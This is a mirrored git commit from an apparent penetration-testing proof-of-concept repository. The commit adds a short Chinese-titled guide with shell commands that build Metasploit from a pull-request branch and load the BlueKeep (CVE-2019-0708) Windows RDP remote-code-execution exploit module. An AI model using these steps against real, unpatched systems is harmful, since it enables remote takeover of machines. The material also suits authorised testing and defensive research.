mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2026-05-21 11:53:54 +08:00
Create cve-2019-0708-msf快速搭建.md
This commit is contained in:
@@ -0,0 +1,11 @@
|
||||
```shell
|
||||
sudo apt-get install libsqlite3-dev libpq-dev libpcap-dev -y
|
||||
git clone https://github.com/rapid7/metasploit-framework.git
|
||||
cd metasploit-framework
|
||||
git fetch origin pull/12283/head:bluekeep
|
||||
git checkout bluekeep
|
||||
sudo gem install bundler && bundle
|
||||
./msfconsole
|
||||
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
|
||||
```
|
||||
> 仅在Debian测试过
|
||||
Reference in New Issue
Block a user